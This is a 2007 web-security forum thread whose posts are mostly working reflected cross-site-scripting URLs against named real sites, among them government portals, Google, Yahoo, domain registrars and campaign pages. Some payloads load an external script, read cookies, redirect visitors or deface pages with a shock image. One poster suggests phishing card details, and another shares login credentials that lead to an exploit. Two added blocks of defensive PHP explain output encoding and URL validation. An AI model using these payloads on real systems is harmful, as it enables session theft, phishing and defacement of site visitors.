Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
Current Page: 40 of 65
Re: So it begins
Posted by: kirke
Date: February 18, 2007 02:36PM

this one is nice too
(XSS script seen elsewhere and usage shamelessly stolen :)

http://www.bmsg.gv.at/cms/site/search.html?query=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

If you look at the returned source, you see that there are some more injections possible. And you also see that the web developers know how to properly encode the data, at least they write it into the HTML comments; heaven knows what that's useful for ..

Re: So it begins
Posted by: kirke
Date: February 18, 2007 02:52PM

http://www.justiz.gv.at/service/content.php?v_search=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

original POST converted to GET, and another example for some stupid php "sanitations" (useless as we all know:)

Re: So it begins
Posted by: kirke
Date: February 18, 2007 03:16PM

The <title> says ..

http://www.bmlv.gv.at/suche/index.php?query_string=XSS%22%3E%3C/title%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

Re: So it begins
Posted by: Lockdown
Date: February 18, 2007 03:20PM

kirke Wrote:
-------------------------------------------------------
> http://www.justiz.gv.at/service/content.php?v_search=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E
>
> original POST converted to GET, and another example for some stupid php "sanitations" (useless as we all know:)


Eh, it's just stupid coders using $_REQUEST[] instead of $_POST

Re: So it begins
Posted by: kirke
Date: February 18, 2007 03:24PM

s/just/additional/

Re: So it begins
Posted by: tx
Date: February 19, 2007 04:59PM

[1] http://www.jordanmatter.com/view.asp?url=><script>alert('xss')</script><p

I'm sure there's a null byte error here as well, I haven't quite figured it out yet....

[2] http://europe.nokia.com/A4164022?url=http'%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%61%6C%65%72%74%28%27%78%73%73%27%29%3B%22%20%69%64%3D%27

That one is kinda nasty because simply changing the url value to the url for some/any file, will cause the user to d/l that file upon clicking the button. (example: http://europe.nokia.com/A4164022?url=http://ckers.org/s.js downloads s.js from ckers.org)

[3] http://www.onemotoring.com.sg/publish/onemotoring/en/popupwebwide/emailurl.popup.html?url=<script>alert('xss')</script> <-- This is great, send xss to your friends!

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 02/19/2007 06:15PM by tx.

Re: So it begins
Posted by: Lockdown
Date: February 20, 2007 07:43AM

That europe nokia one could be improved on. It's nasty just for downloading trojans and stuff, which would be very bad, but also, to make it just more instajavascripty

http://europe.nokia.com/A4164022?url=javascript:alert(%22XSS%22);


or, just onload
http://europe.nokia.com/A4164022?url='%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cspan

Whateva floats yo boat ;-)

-Lockdown-

http://www.rawrcore.net

Re: So it begins
Posted by: christ1an
Date: February 20, 2007 11:12AM

Snap:
http://www.snap.com/php/widgets/no_results.php?query=%3Cscript%3Ealert('xss');%3C/script%3E

Re: So it begins
Posted by: tx
Date: February 20, 2007 03:02PM

http://search.cityguide.aol.com/baltimore/search/search.adp?page=%6C%69%73%74%69%6E%67%73%4C%6F%6E%67%22%3B%61%6C%65%72%74%28%27%78%73%73%27%29%3B%69%3D%22 <- This of course works when searching in any city

-tx @ lowtech-labs.org

Re: So it begins
Posted by: blad3
Date: February 20, 2007 04:23PM

I was browsing the pages tagged with xss on del.icio.us and found this:

http://www.google.com/bookmarks/?num=1%22</script><script>alert('xss')</script>
http://del.icio.us/kimoto

It seems to work if you are logged in to Google Bookmarks.

It was used to run this script (to display a fake Google TV :P)
http://hamachiya.com/junk/gtv

Update:
Both Google XSS-es are fixed now.



Edited 3 time(s). Last edit at 02/21/2007 12:13AM by blad3.

Re: So it begins
Posted by: nEUrOO
Date: February 20, 2007 06:03PM

Another Google one: Google Search History (you need to subscribe to this service):
http://www.google.com/searchhistory/?hl=en&num=%22%3Cscript%3Ealert('XSS');%3C/script%3E

Btw, this is the same parameter...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/20/2007 06:14PM by nEUrOO.

Re: So it begins
Date: February 20, 2007 06:16PM

I played with this one for a while, and they filtered script tags, single quotes, and escaped double quotes. HTML worked fine though.

http://www.bleacheatingfreaks.com/showPic.php?pic=http://ha.ckers.org<meta http-equiv=refresh content=1;url=http://www.awesomeandrew.net/>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: digi7al64
Date: February 20, 2007 10:07PM

Specially for jungsonn

http://www.redsonn.com/hi/go.php?mickey=&mouse=%27%3C%2Fscript%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C73%29%29%3C%2Fscript%3E%3B&submit=Foo+this%21

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: ryduh
Date: February 21, 2007 12:12AM

http://fusion.kallback.com/k7/vanity3.cfm?DID=111111"><script>alert('xss');</script>"1111

---------
Patience is a waste of time.

Re: So it begins
Date: February 21, 2007 10:41AM

http://saybox3.co.uk/checkuser.php?username=<script>alert('Hopefully you will see this on your logs, and fix the hole.');location.href='http://www.awesomeandrew.net';</script>&name=&age=


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: Anonymous User
Date: February 21, 2007 02:26PM

Search FBN-Security Bloggers Network:
http://www.lijit.com/pvs/FBN-Security%20Bloggers%20Network?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D&pvssearchtype=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D

Found here:
http://jeremiahgrossman.blogspot.com/2007/02/automated-scanners-vs-low-hanging-fruit.html#links

;)

Greetings,
.mario

Re: So it begins
Posted by: tx
Date: February 21, 2007 07:32PM

http://www.ctcvista.org/directory/organizations?sort=desc&order=Organization"onload="alert('xss');

Why oh why would somebody echo the url (unfiltered) into the <body> tag as its id?!

-tx @ lowtech-labs.org

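Lockdown's remark a few posts up about `$_REQUEST[]` versus `$_POST`, and tx's question here about a URL echoed unencoded into the `<body>` tag's id, point at the same pair of defects. The PHP below is an added example, not code from the thread or from any of the sites named in it; the parameter name `order`, the `<body id="...">` output, the allow-list values and the function names are assumptions chosen to mirror the ctcvista case.

```php
<?php
// Added example (not code from the thread or from any site named in it).
// Two defects the posts above point at: reading input through $_REQUEST,
// which merges GET, POST and COOKIE so a "POST-only" form is reachable from
// a plain link; and writing that input into an HTML attribute unencoded.
// The parameter name "order", the <body id="..."> output and the function
// names are assumptions chosen to mirror the ctcvista example.
declare(strict_types=1);

// Vulnerable pattern. In the live application $input would be $_REQUEST.
function render_vulnerable(array $input): string
{
    $order = $input['order'] ?? 'asc';
    return '<body id="' . $order . '">';   // raw reflection into an attribute
}

// Hardened pattern. In the live application $method is $_SERVER['REQUEST_METHOD']
// and $post is $_POST: only the superglobal matching the intended method is read.
function render_hardened(string $method, array $post): string
{
    if ($method !== 'POST') {
        return '<body id="asc">';          // a GET never gets to supply the value
    }
    $order = $post['order'] ?? 'asc';
    if (!in_array($order, ['asc', 'desc'], true)) {
        $order = 'asc';                    // allow-list: the only two values that exist
    }
    // Encode for the exact output context as the last step. ENT_QUOTES covers
    // both quote characters; the explicit charset keeps the encoder honest on
    // malformed multibyte input.
    $safe = htmlspecialchars($order, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<body id="' . $safe . '">';
}

// A free-text field (a search term, say) cannot be allow-listed, so the
// encoder alone has to carry it. Same function, same context rule.
function attribute_value(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample (not a captured request), shaped like the ctcvista value.
$sample = ['order' => 'Organization"onload="alert(1);'];

echo render_vulnerable($sample), "\n";           // attribute closed, handler injected
echo render_hardened('GET', $sample), "\n";      // input ignored, default used
echo render_hardened('POST', $sample), "\n";     // not in the allow-list, default used
echo '<input value="' . attribute_value($sample['order']) . '">', "\n";  // quotes encoded
```

`htmlspecialchars` with `ENT_QUOTES` turns `"` into `&quot;` and, under `ENT_HTML5`, `'` into `&apos;`, so a reflected value can never close a double- or single-quoted attribute; the method check and the allow-list are what remove the POST-to-GET conversion kirke mentioned. Encoding is per output context: the same value dropped into a `<script>` block or into a URL needs a different encoder, which is exactly why the sites that "encode into the HTML comments" but nowhere else were still exposed.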
Re: So it begins
Posted by: daltd
Date: February 21, 2007 08:13PM

Namecheap.com uses HelpSpot for their support center which is vulnerable to XSS.
www.namecheap.com: http://www.namecheap.com/support/index.php?pg=request.check&id=%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd%20uNF!';%22%3E&submit=Check

www.godaddy.com: https://www.godaddy.com/gdshop/radio/popup_pic.asp?se=%2B&ci=5291&app_hdr=0&display=../img_posterlrg.png%22%3E%3Cbody%20onload=%22javascript:document.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!';%22%3E%3Cdiv%20id=%22
www.networksolutions.com: https://www.networksolutions.com/help/sales-contact.jsp?callingPage=%22%3E%3Cbody%20onload=%22javascript:document.title='Networksolutions.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF%3C/center%3E';%22%3E
marketplacepro.moniker.com: http://marketplacepro.moniker.com/search/cat/11243936/keyword/s:%3Cbody%20onload=%22document.title='marketplacepro.moniker.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd&nbsp;uNF!';%22%3E/
www.namesecure.com: https://www.namesecure.com/en_US/jhtml/dcs-docs/whois_popup.jhtml?domainname=%22%3E%3Cbody%20onload=%22javascript:document.title='NameSecure.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&tld=com
www.enom.com: http://www.enom.com/auctions/auctions.asp?page=premium&type=%3C/script%3E%3Cbody%20onload=%22javascript:document.title='eNom.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E
secure.registerapi.com: https://secure.registerapi.com/KM/KnowledgeBase/script_search_documents.php?account_name=4798&search_advanced=0&search_type=data_keywords&search_string=%22%3E%3Cscript%3Edocument.title='secure.registerapi.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%3C/script%3E



Edited 6 time(s). Last edit at 02/23/2007 08:46PM by daltd.

Re: So it begins
Posted by: tx
Date: February 22, 2007 04:36PM

Hello China!
------------

http://search.zol.com.cn/s/search.php?keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://bbs.book.sina.com.cn/?h=javascript:alert('xss');document.location='http://www.google.com';

http://watsagri.nstl.gov.cn/SPT--QuickSearch.php?F_SearchString=<script>alert(String.fromCharCode(88,83,83))//</script>

http://www.whjtj.gov.cn/search.php?type=&keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://passport.pchome.net/login.php?username="><script>alert('hello%20pxss')</script><p%20id="
^ This one is kind of interesting, doesn't alert on the page at passport.pchome.net, but if the user then navigates to my.pchome.net the script executes (IE only, I think... couldn't make FF alert, but I could see that the vector persists through the subdomains.)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/22/2007 04:36PM by tx.

Re: So it begins
Posted by: daltd
Date: February 22, 2007 06:20PM

www.joker.com: https://www.joker.com/faq/index.php?search=%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&num=50
www.sedo.com: http://www.sedo.com/faq/index.php?action=search&suchbegriff=%22%3E%3Cscript%3Edocument.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33,60,98,114,62,60,98,114,62);%3C/script%3E
www.registar.com: http://www.registar.com/mydomains.cgi?email=domain@domain.com%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
secure.directnic.com: https://secure.directnic.com/help/faq/search.php?search=domain.com%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E%3Cdiv%20id=%22
www.history.com: http://www.history.com/cite.do?title=%3Cbody%20onload=%22javascript:document.title='History.com%20-%20XSS%20PoC';%20document.body.innerHTML='<center><br>daltd%20uNF!</center>';%22%3E&url=http://sla.ckers.org/



Edited 2 time(s). Last edit at 02/23/2007 08:44PM by daltd.

Re: So it begins
Posted by: SystemOfAHack
Date: February 22, 2007 07:13PM

Nice findings daltd ;p

Here's something for people to try if you're short on XSS-worthwhile sites. Make a list of all the websites that come up during tv commercials :p
I'm sure I found a little something in lloydstsb.com the other day. Anyway, here's one for starters:

http://www.channel4.com/entertainment/games/chart.jsp?genre=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Re: So it begins
Posted by: daltd
Date: February 23, 2007 02:03AM

SystemOfAHack, thanks.

www.facebattle.com: http://www.facebattle.com/registercomplete.aspx?emailaddress=domain@domain.com%22%3Cscript%3Edocument.title='facebattle.com%20-%20daltd';%20alert('xss');%3C/script%3E
www.catholic.net: http://www.catholic.net/linksframe.phtml?link=Catholic.net%20-%20XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3Cbr%3E%3Cimg%20src=http://mad.girls-eater.com/dtr/thumbs/ce2e62.jpg%3E%3C/center%3E';%22%3E%3Cdiv%20id=%22
www.kidney.org: http://www.kidney.org/site/exit_page.cfm?ch=203&link=domain.com%22%3E%3Cbody%20onload=%22javascript:document.title='Kidney.org%20-%20National%20Kidney%20Foundation%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22
content.scholastic.com: http://content.scholastic.com/browse/searchHelp.jsp?query=%3Cbody%20onload=%22javascript:document.title='content.scholastic.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E
videosearch.comcast.net: http://videosearch.comcast.net/ss-query/videosearch.jsp?q=%22%3E%3Cbody%20onload=%22javascript:document.title='videosearch.comcast.net%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22

I would also like to mention that all the comcast.com and comcast.net XSS vulnerabilities posted here are still 100% working at the time of this post, if anyone cares: [1] http://sla.ckers.org/forum/read.php?3,44,4045#msg-4045 [2] http://sla.ckers.org/forum/read.php?3,44,812#msg-812 [3] http://sla.ckers.org/forum/read.php?3,44,796#msg-796

later.

Re: So it begins
Date: February 23, 2007 11:48AM

Do me a favor, and continually visit this one until Google decides to put it up on their results. If you are religious, offended by Atheism, or would become sick at the sight of Goatse, don't click it. I just figured I'd provide some payback for the call I received on my cell phone.

http://www.krks.com/common/player/swn/CustomPlayer.asp?url=&MinTitle=</title>Awesome%20AnDrEw%20says,%20"Don't%20ever%20call%20my%20phone%20asking%20if%20I've%20been%20forgiven%20by%20the%20"Savior%20Jesus%20Christ".%20Do%20I%20call%20you%20wondering%20whether%20you've%20learned%20that%20the%20bullshit%20you've%20been%20force%20fed%20your%20entire%20life%20has%20taken%20hold%20of%20your%20free%20will?%20Don't%20fucking%20solicit%20me%20again,%20thanks.<br><img%20src="http://www.goatse.cz/hello.jpg"><!--


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: bubbles
Date: February 23, 2007 04:22PM

http://www.ticketweb.com/user/?region=xxx&query=search&category=misc&search=%3Cscript%3E+alert%28%27xss%27%29%3B%3C%2Fscript%3E&searchregion=xxx&genre=none&beginmonth=02&beginday=23&beginyear=2007&endmonth=02&endday=23&endyear=2008&sortorder=0
http://www.tickets.com/search.cgi?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

Would be interesting to hack a band's MySpace and post a link to "Buy Tickets" for some show... Then just phish CC and stuff.

-bubbles
http://webmastertutorials.net



Edited 1 time(s). Last edit at 02/23/2007 04:28PM by bubbles.

Re: So it begins
Posted by: tx
Date: February 23, 2007 04:27PM

http://www.blinkbits.com/search/search.php?q=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22%20
http://monsanto.mediaroom.com/index.php?s=43"><script>alert('xss1');</script>&item=457"><script>alert('xss2');</script> <- doesn't work in FF
http://monsanto.mediaroom.com/index.php?s=82&query=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

[Edit: let's add a few more..]
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=javascript:alert('xss');
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=--%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!-- <-same variable, different area in the page.

http://www.carlyle.com/eng/search/default.asp?SearchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E%3Cp+id%3D%22&SubmitButton.x=31&SubmitButton.y=8
http://my.barackobama.com/page/user/manage?uu=%22%00%0a%0d%3e%3C%2F%6E%6F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E [Login with the following info and it will gladly redirect you to the exploit U:jquest@mytrashmail.com P:hajji ]
http://www.votehillary.org/CMS/forward/%3Cimg%20src=%22fds%22onerror=%22alert(String.fromCharCode(88,83,83))%22%3E
http://www.draftrudygiuliani.com/read_article.php?id=655%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22
http://www.gohunter08.com/comtools/e-photogallery/displayContent.asp?action=1C0A0E1D0C07&text=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp%20id=%22

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/23/2007 07:31PM by tx.

Re: So it begins
Posted by: daltd
Date: February 23, 2007 08:43PM

Looks like Namecheap removed the software they were using for their support system, so the previous XSS vulnerability I posted is no longer active; either way, here's another one I found:

www.namecheap.com: https://www.namecheap.com/domain-pricing.asp?fieldno=0&orderby=ASC&Pane=show&tld=cc%22%3E%3Cbody%20onload=%22document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&pricefor=register

Re: So it begins
Posted by: digi7al64
Date: February 24, 2007 04:42AM

With all the recent stuff surrounding Google I thought I would check out how secure Yahoo was in comparison... 'cause I have never really bothered to audit the domain, so to speak. Anyways, within 5 minutes I had my first XSS.

http://cosmos.bcst.yahoo.com/scp_v3/viewer/index.php?pid=16471&rn=248153;alert(document.cookie);p=1&cl=1939839&ch=248154

Hopefully there are many more to come.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: daltd
Date: February 24, 2007 07:12AM

www.realpics.net: http://www.realpics.net/forums/28/105148/edit/?');document.title=String.fromCharCode(82,101,97,108,112,105,99,115,46,110,101,116,32,45,32,88,83,83,32,80,111,67);document.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33);alert('XSS : Click on the Alert Moderator link
www.imdb.com: http://www.imdb.com/gallery/granitz/5335/FreddyRodr_Grani_11250280_400.jpg.html?path=%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E
javascript.about.com: http://javascript.about.com/gi/dynamic/offsite.htm?site=XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E

Re: So it begins
Posted by: digi7al64
Date: February 24, 2007 08:20AM

#2 for yahoo \0/

This one is a two-parter in that it requires you to click the link returned from the 302 response. Tried all types of response splitting with no luck.

http://shopping.yahoo.co.uk/ctl/go/displayLink?link=javascript:alert('xss');

EDIT [Appears to affect all yahoo "shopping" domains - making it effective against all Yahoo sites.. except the .com version :( here are a couple]
http://shopping.yahoo.it/ctl/go/displayLink?userClick=true&link=javascript:alert('xss');
http://shopping.yahoo.no/ctl/go/displayLink?link=javascript%3Aalert%28%27xss%27%29%3B


Thank you apache for default configuration settings and yahoo for not implementing standardized error pages across all their servers.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 02/24/2007 08:42AM by digi7al64.

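Several of the links in this thread go through a parameter that carries a URL (the Nokia `url=`, the sina.com.cn `h=`, the Halliburton `newsurl=`, the Yahoo Shopping `link=` above) and accept a `javascript:` value, which then lands in an href or, as in the Yahoo case, in a 302 redirect the user is asked to follow. Below is an added PHP example, not from the thread or from any site named in it, of the scheme and host allow-list check a defender would put in front of such a parameter; the function names, the allow-list contents and the sample values are mine.

```php
<?php
// Added example (not code from the thread or from any site named in it).
// A parameter that carries a URL is validated by scheme (and optionally host)
// before it is used as an href or as a redirect target. Function names, the
// allow-list contents and the sample values are mine.
declare(strict_types=1);

function is_allowed_link(string $url, array $allowedHosts = []): bool
{
    // Browsers ignore tabs and newlines inside a scheme, and a CR/LF inside a
    // Location header would split the response, so reject any control
    // character or space before parsing rather than trying to strip it.
    if (preg_match('/[\x00-\x20\x7F]/', $url) === 1) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;   // unparsable, relative, or scheme-less ("//host/...") values
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;   // javascript:, data:, vbscript: and everything else
    }
    // For a redirect endpoint also pin the host: "any http(s)" is still an open redirect.
    return $allowedHosts === []
        || in_array(strtolower($parts['host']), $allowedHosts, true);
}

// Redirect endpoint: only an allowed absolute URL reaches the Location header,
// everything else falls back to a fixed local path.
function redirect_target(string $candidate, array $allowedHosts, string $fallback = '/'): string
{
    return is_allowed_link($candidate, $allowedHosts) ? $candidate : $fallback;
}

// Link rendering: validate first, then encode for the attribute context so the
// URL's own quote characters cannot break out of the tag either.
function link_html(string $candidate, string $text): string
{
    $href = is_allowed_link($candidate) ? $candidate : '#';
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
         . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</a>';
}

// Constructed samples (not captured requests).
$samples = [
    'https://example.com/page?x=1',       // allowed by scheme
    'javascript:alert(1)',                // disallowed scheme
    "java\tscript:alert(1)",              // control character inside the scheme
    '//example.com/',                     // no scheme: rejected as ambiguous
    'https://example.com@evil.example/',  // userinfo trick: the real host is evil.example
];
foreach ($samples as $s) {
    printf("%-40s %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
        is_allowed_link($s) ? 'allowed' : 'rejected');
}
// With the host pinned, the userinfo sample and the javascript: sample both
// fall back to the local path.
printf("%s\n", redirect_target('javascript:alert(1)', ['example.com']));
printf("%s\n", redirect_target('https://example.com@evil.example/', ['example.com']));
echo link_html('https://example.com/?a=1&b=2', 'Example'), "\n";
```

The scheme check is what stops the `javascript:` values in the thread; the host allow-list is the part that is easy to forget, because a redirector that accepts any `http(s)` URL is still a phishing aid of the kind bubbles describes with the ticket-site links. Both checks run on the decoded parameter value, and the encoding step in `link_html` is kept separate so neither one is skipped when the other is.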
Re: So it begins
Posted by: Anonymous User
Date: February 24, 2007 05:36PM

http://www.esso.de/cgi-bin/htsearch.cgi?config=esso.de-htdig&restrict=http%3A%2F%2Fwww.esso.de%2F&exclude=&words=%22%3E%3Cdiv+style%3D%22position%3Aabsolute%3B+top%3A+0px%3B+left%3A+0px%3B+width%3A+100%25%3B+height%3A+100%25%3B+background-color%3A+%23f00%3B%22%3Epwned%3C%2Fdiv%3E&x=0&y=0
